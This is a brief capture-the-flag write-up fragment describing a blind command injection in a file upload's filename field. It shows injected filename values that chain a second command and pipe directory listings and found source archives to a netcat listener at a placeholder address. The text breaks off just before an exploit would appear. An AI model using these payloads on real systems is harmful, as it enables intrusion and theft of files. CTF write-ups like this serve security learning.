This challenge was solved by and the write up was written by teammates, nguyen and akg
Through testing to know it’s a blind cmd injection in filename of a file upload.
Set a host listen to a port and inject a cmd, ex:
filename.txt; ls |nc ip port
To copy the source,
find .. -iname '*gz'|xargs cat|nc ip port, analyze it, we have expl: